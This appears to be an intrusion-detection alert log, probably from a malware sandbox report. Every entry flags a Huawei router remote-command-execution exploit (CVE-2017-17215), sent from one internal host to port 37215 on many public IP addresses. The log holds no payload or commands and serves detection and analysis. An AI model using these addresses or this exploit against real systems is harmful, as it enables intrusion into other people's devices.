                                                    07/10/24-08:26:41.311448TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4404037215192.168.2.14197.208.97.99
                                                    07/10/24-08:26:47.754938TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3623237215192.168.2.14157.30.181.60
                                                    07/10/24-08:26:22.281648TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3628437215192.168.2.14197.140.7.174
                                                    07/10/24-08:26:57.530993TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3685437215192.168.2.14197.235.4.122
                                                    07/10/24-08:26:57.669251TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5786437215192.168.2.14197.205.160.11
                                                    07/10/24-08:26:41.351046TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5894637215192.168.2.14197.89.245.197
                                                    07/10/24-08:27:31.468333TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5152637215192.168.2.1489.102.87.82
                                                    07/10/24-08:26:36.394343TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4567237215192.168.2.14197.36.215.39
                                                    07/10/24-08:26:45.623993TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4573637215192.168.2.1441.219.220.195
                                                    07/10/24-08:27:02.749504TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3398237215192.168.2.1441.77.220.242
                                                    07/10/24-08:27:10.595154TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4223437215192.168.2.1441.213.242.235
                                                    07/10/24-08:27:33.753390TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4602837215192.168.2.14136.121.47.149
                                                    07/10/24-08:26:14.755062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4294837215192.168.2.14157.204.251.22
                                                    07/10/24-08:26:38.655594TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4188637215192.168.2.1441.16.172.217
                                                    07/10/24-08:27:24.962924TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4161237215192.168.2.14197.172.35.98
                                                    07/10/24-08:27:02.731752TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5941837215192.168.2.14197.218.239.186
                                                    07/10/24-08:26:33.166033TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4981237215192.168.2.1441.96.107.193
                                                    07/10/24-08:26:49.921698TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3333637215192.168.2.14197.146.73.219
                                                    07/10/24-08:27:00.602684TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4884037215192.168.2.14157.76.60.117
                                                    07/10/24-08:27:02.985510TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5288037215192.168.2.14197.177.99.27
                                                    07/10/24-08:27:31.497518TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3812037215192.168.2.14161.194.49.20
                                                    07/10/24-08:26:43.613127TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4410437215192.168.2.14126.220.17.127
                                                    07/10/24-08:26:53.114397TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5841637215192.168.2.14197.188.73.170
                                                    07/10/24-08:27:14.821863TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5357637215192.168.2.14157.123.67.184
                                                    07/10/24-08:27:05.164451TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5609437215192.168.2.14197.85.224.230
                                                    07/10/24-08:26:23.314793TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5624837215192.168.2.14197.141.175.130
                                                    07/10/24-08:26:47.919508TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6063237215192.168.2.1441.244.45.54
                                                    07/10/24-08:27:10.679759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4414637215192.168.2.14197.100.96.50
                                                    07/10/24-08:27:19.309217TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3367037215192.168.2.14157.220.187.38
                                                    07/10/24-08:26:43.680927TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4625437215192.168.2.14199.185.163.230
                                                    07/10/24-08:27:27.168344TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5241837215192.168.2.14197.69.41.83
                                                    07/10/24-08:27:10.530292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5734237215192.168.2.14197.155.248.90
                                                    07/10/24-08:26:43.792602TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3375437215192.168.2.14197.60.157.51
                                                    07/10/24-08:27:23.832820TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3936437215192.168.2.14157.28.253.90
                                                    07/10/24-08:27:28.076787TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5958437215192.168.2.1414.114.176.107
                                                    07/10/24-08:27:20.414993TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4663237215192.168.2.1441.159.93.150
                                                    07/10/24-08:27:28.076787TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4868637215192.168.2.1441.77.118.97
                                                    07/10/24-08:27:17.103998TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4607837215192.168.2.14197.99.220.241
                                                    07/10/24-08:26:34.164595TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4658037215192.168.2.1441.241.54.204
                                                    07/10/24-08:27:05.158700TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4848637215192.168.2.14197.202.170.144
                                                    07/10/24-08:26:13.787067TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3890237215192.168.2.14157.71.211.82
                                                    07/10/24-08:27:11.529437TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5865637215192.168.2.14157.155.81.31
                                                    07/10/24-08:26:47.964630TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3422637215192.168.2.1441.168.4.116
                                                    07/10/24-08:26:59.522844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4010837215192.168.2.1470.104.11.198
                                                    07/10/24-08:27:30.522972TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4208437215192.168.2.1466.196.134.208
                                                    07/10/24-08:26:57.619989TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4376837215192.168.2.14197.9.77.107
                                                    07/10/24-08:26:59.634541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3523837215192.168.2.14197.153.184.12
                                                    07/10/24-08:27:07.361333TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5580437215192.168.2.14157.8.230.172
                                                    07/10/24-08:26:26.589238TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4626837215192.168.2.1441.74.164.230
                                                    07/10/24-08:26:33.249183TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5688437215192.168.2.14202.228.92.237
                                                    07/10/24-08:26:55.440682TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5493837215192.168.2.1441.190.47.56
                                                    07/10/24-08:26:45.632030TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4483837215192.168.2.14197.219.151.228
                                                    07/10/24-08:27:33.811617TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5060037215192.168.2.1463.112.20.205
                                                    07/10/24-08:27:24.973099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4422237215192.168.2.14197.154.2.100
                                                    07/10/24-08:26:22.270061TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5384437215192.168.2.14157.52.254.174
                                                    07/10/24-08:27:10.542013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3755837215192.168.2.14197.69.182.34
                                                    07/10/24-08:27:23.889378TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5738437215192.168.2.14197.193.170.6
                                                    07/10/24-08:26:43.737696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3724437215192.168.2.1451.10.176.15
                                                    07/10/24-08:26:49.853498TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3588437215192.168.2.14125.190.213.27
                                                    07/10/24-08:26:43.825579TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4545837215192.168.2.1441.24.7.238
                                                    07/10/24-08:26:14.810529TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5355437215192.168.2.14197.132.153.201
                                                    07/10/24-08:27:17.073080TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4811637215192.168.2.14157.117.27.245
                                                    07/10/24-08:26:31.077497TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3555237215192.168.2.14197.168.19.226
                                                    07/10/24-08:26:41.366871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3621637215192.168.2.1441.110.251.197
                                                    07/10/24-08:27:22.879790TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4728637215192.168.2.14157.165.64.182
                                                    07/10/24-08:26:49.775656TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3390837215192.168.2.1441.221.182.176
                                                    07/10/24-08:27:14.660199TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3481037215192.168.2.14197.107.32.167
                                                    07/10/24-08:27:24.906291TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5542437215192.168.2.14157.20.80.192
                                                    07/10/24-08:26:45.587142TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6050237215192.168.2.1441.138.104.14
                                                    07/10/24-08:27:07.390011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3330637215192.168.2.1414.209.47.246
                                                    07/10/24-08:26:53.121887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5939837215192.168.2.14157.145.45.43
                                                    07/10/24-08:26:47.981369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3619237215192.168.2.1441.46.201.208
                                                    07/10/24-08:26:55.400530TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3587637215192.168.2.14184.204.116.153
                                                    07/10/24-08:27:22.545396TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5525437215192.168.2.14157.122.138.254
                                                    07/10/24-08:26:42.391743TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4104837215192.168.2.14162.41.182.238
                                                    07/10/24-08:26:36.424443TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4646837215192.168.2.14157.236.100.219
                                                    07/10/24-08:26:59.541812TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4859437215192.168.2.1445.19.166.45
                                                    07/10/24-08:27:28.138788TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4465237215192.168.2.14197.11.10.200
                                                    07/10/24-08:26:53.127058TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4478037215192.168.2.14197.159.127.95
                                                    07/10/24-08:27:10.699578TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4480837215192.168.2.14197.76.159.183
                                                    07/10/24-08:27:30.444942TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3644837215192.168.2.1443.231.250.230
                                                    07/10/24-08:27:24.983854TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5214637215192.168.2.14157.222.35.31
                                                    07/10/24-08:26:26.583934TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4432437215192.168.2.1441.75.21.154
                                                    07/10/24-08:26:29.813463TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4836837215192.168.2.14157.5.150.232
                                                    07/10/24-08:27:05.237308TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5961437215192.168.2.14157.74.228.179
                                                    07/10/24-08:27:13.808295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6029237215192.168.2.14157.247.117.137
                                                    07/10/24-08:26:20.134235TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4176637215192.168.2.14157.33.104.223
                                                    07/10/24-08:27:02.742561TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3350037215192.168.2.14157.91.42.113
                                                    07/10/24-08:27:07.376838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4877437215192.168.2.14179.255.251.34
                                                    07/10/24-08:27:28.042131TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5672837215192.168.2.14197.73.108.202
                                                    07/10/24-08:26:42.386874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4564637215192.168.2.14171.107.145.59
                                                    07/10/24-08:26:43.678102TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3841037215192.168.2.14197.13.127.152
                                                    07/10/24-08:26:43.752135TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5579437215192.168.2.14163.155.146.95
                                                    07/10/24-08:27:20.466175TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5458437215192.168.2.14197.113.92.12
                                                    07/10/24-08:26:13.755859TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3600237215192.168.2.1441.98.121.110
                                                    07/10/24-08:26:14.755874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4940837215192.168.2.1441.53.208.133
                                                    07/10/24-08:27:05.164173TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3465637215192.168.2.1441.33.132.122
                                                    07/10/24-08:27:11.544699TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4876637215192.168.2.14197.214.95.9
                                                    07/10/24-08:26:42.404259TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4012837215192.168.2.1497.37.142.108
                                                    07/10/24-08:27:02.991473TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3337037215192.168.2.1441.3.74.224
                                                    07/10/24-08:26:25.522450TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5328837215192.168.2.1439.164.41.239
                                                    07/10/24-08:27:07.272615TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4491237215192.168.2.14197.210.91.138
                                                    07/10/24-08:27:17.014699TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4977437215192.168.2.1481.133.111.161
                                                    07/10/24-08:27:19.253798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4366037215192.168.2.14197.224.78.233
                                                    07/10/24-08:26:28.859810TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5868037215192.168.2.1441.136.93.137
                                                    07/10/24-08:27:08.444805TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3787437215192.168.2.14197.74.124.6
                                                    07/10/24-08:26:29.848557TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5385637215192.168.2.14157.72.19.144
                                                    07/10/24-08:27:32.603771TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5324237215192.168.2.14157.187.62.63
                                                    07/10/24-08:26:29.846254TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5004637215192.168.2.14112.215.26.210
                                                    07/10/24-08:26:11.545606TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4427037215192.168.2.1495.166.133.4
                                                    07/10/24-08:26:43.706430TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3348437215192.168.2.14162.218.117.227
                                                    07/10/24-08:27:22.761742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3918237215192.168.2.14157.132.251.100
                                                    07/10/24-08:26:23.337852TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5373437215192.168.2.14197.160.59.87
                                                    07/10/24-08:26:33.260181TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4491637215192.168.2.14157.224.172.66
                                                    07/10/24-08:26:43.929800TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3817437215192.168.2.14197.119.213.69
                                                    07/10/24-08:26:53.207005TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5928237215192.168.2.14157.236.205.11
                                                    07/10/24-08:27:22.835700TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4191837215192.168.2.14197.105.98.3
                                                    07/10/24-08:26:45.658407TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5964237215192.168.2.1441.229.232.125
                                                    07/10/24-08:26:48.002361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4098237215192.168.2.1441.160.177.78
                                                    07/10/24-08:27:22.781993TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3486637215192.168.2.14157.180.237.38
                                                    07/10/24-08:27:22.874012TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4573437215192.168.2.14197.138.150.205
                                                    07/10/24-08:26:57.655011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4472437215192.168.2.14197.96.178.61
                                                    07/10/24-08:26:29.858184TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3880837215192.168.2.14197.8.239.201
                                                    07/10/24-08:27:31.545900TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3648437215192.168.2.1496.18.227.140
                                                    07/10/24-08:26:47.988456TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6041037215192.168.2.14157.93.100.208
                                                    07/10/24-08:26:13.647061TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6080837215192.168.2.1441.136.97.20
                                                    07/10/24-08:26:23.328619TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4055037215192.168.2.14197.25.186.29
                                                    07/10/24-08:26:47.989699TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4405037215192.168.2.1441.68.194.233
                                                    07/10/24-08:26:43.881879TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4567637215192.168.2.14113.210.96.68
                                                    07/10/24-08:26:41.517313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5620037215192.168.2.14203.19.194.80
                                                    07/10/24-08:27:27.051351TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4416837215192.168.2.14197.101.33.71
                                                    07/10/24-08:26:15.795103TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3598237215192.168.2.14157.163.125.144
                                                    07/10/24-08:27:28.100122TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5457837215192.168.2.1441.140.141.16
                                                    07/10/24-08:26:43.851748TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3313837215192.168.2.14197.59.126.74
                                                    07/10/24-08:27:30.489960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5892437215192.168.2.14157.223.223.122
                                                    07/10/24-08:27:30.544401TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3869037215192.168.2.1441.199.126.152
                                                    07/10/24-08:26:36.403967TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5426237215192.168.2.14133.30.140.218
                                                    07/10/24-08:27:05.155297TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4085037215192.168.2.14157.48.4.206
                                                    07/10/24-08:26:11.524637TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4178837215192.168.2.14157.119.94.143
                                                    07/10/24-08:26:15.863790TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4403637215192.168.2.1414.218.177.51
                                                    07/10/24-08:27:27.047599TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3687637215192.168.2.14197.44.83.209
                                                    07/10/24-08:26:15.863790TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5148037215192.168.2.14157.55.20.78
                                                    07/10/24-08:26:26.602749TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5818037215192.168.2.14197.236.11.10
                                                    07/10/24-08:26:57.675135TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5847237215192.168.2.14157.69.17.145
                                                    07/10/24-08:26:14.822403TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3349037215192.168.2.1475.28.53.202
                                                    07/10/24-08:27:05.109187TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4222237215192.168.2.1441.65.221.82
                                                    07/10/24-08:26:52.022558TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3516637215192.168.2.14209.151.11.90
                                                    07/10/24-08:26:28.876490TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4984437215192.168.2.14207.166.243.232
                                                    07/10/24-08:26:15.873378TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3467837215192.168.2.14197.180.133.107
                                                    07/10/24-08:26:26.598533TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5603437215192.168.2.14197.28.171.252
                                                    07/10/24-08:27:23.863444TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3285237215192.168.2.14157.72.30.170
                                                    07/10/24-08:26:34.191107TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5114437215192.168.2.14157.100.102.53
                                                    07/10/24-08:27:10.739148TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5203837215192.168.2.14163.108.99.76
                                                    07/10/24-08:26:25.441344TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3355237215192.168.2.1441.113.247.183
                                                    07/10/24-08:26:14.814365TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4724837215192.168.2.14197.138.182.14
                                                    07/10/24-08:26:22.279073TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5229637215192.168.2.14197.0.24.227
                                                    07/10/24-08:26:29.836593TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4536237215192.168.2.1441.144.1.9
                                                    07/10/24-08:26:28.650487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4210837215192.168.2.14213.123.152.115
                                                    07/10/24-08:26:59.665710TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4709437215192.168.2.1441.130.10.50
                                                    07/10/24-08:26:43.549542TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5971837215192.168.2.14157.113.85.82
                                                    07/10/24-08:26:47.746309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3822437215192.168.2.14197.71.103.228
                                                    07/10/24-08:26:55.319279TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5964237215192.168.2.14157.154.223.160
                                                    07/10/24-08:26:43.848074TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4377837215192.168.2.14157.25.169.67
                                                    07/10/24-08:26:59.801694TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4690037215192.168.2.1477.249.249.93
                                                    07/10/24-08:27:19.205775TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4904837215192.168.2.1441.53.141.103
                                                    07/10/24-08:26:20.132351TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5955037215192.168.2.1441.154.199.110
                                                    07/10/24-08:26:59.665710TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5441837215192.168.2.1441.87.43.110
                                                    07/10/24-08:26:38.655594TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5240437215192.168.2.14197.177.102.246
                                                    07/10/24-08:26:49.819719TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5668037215192.168.2.14197.195.140.198
                                                    07/10/24-08:26:33.243184TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4625037215192.168.2.14197.74.226.56
                                                    07/10/24-08:27:13.915604TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4581437215192.168.2.14197.18.157.74
                                                    07/10/24-08:26:17.947291TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5256837215192.168.2.1417.76.2.106
                                                    07/10/24-08:27:14.865021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5205637215192.168.2.14197.18.237.11
                                                    07/10/24-08:26:11.619310TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3670437215192.168.2.1441.92.120.108
                                                    07/10/24-08:27:30.468804TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5193237215192.168.2.14157.245.163.74
                                                    07/10/24-08:26:59.873072TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5218637215192.168.2.14157.111.41.24
                                                    07/10/24-08:26:26.589238TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4333837215192.168.2.14197.139.120.131
                                                    07/10/24-08:27:24.951941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4234637215192.168.2.14157.8.224.88
                                                    07/10/24-08:27:14.890469TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3525037215192.168.2.14157.122.92.189
                                                    07/10/24-08:26:48.008674TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4909237215192.168.2.1441.87.150.215
                                                    07/10/24-08:27:08.415966TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5369037215192.168.2.14157.212.119.253
                                                    07/10/24-08:26:41.510075TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4090637215192.168.2.14157.72.108.133
                                                    07/10/24-08:26:14.625044TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4744437215192.168.2.1453.40.112.156
                                                    07/10/24-08:26:28.843538TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3892437215192.168.2.1480.72.113.179
                                                    07/10/24-08:27:30.486593TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5629837215192.168.2.1441.37.60.185
                                                    07/10/24-08:26:47.824141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5051237215192.168.2.14197.241.4.242
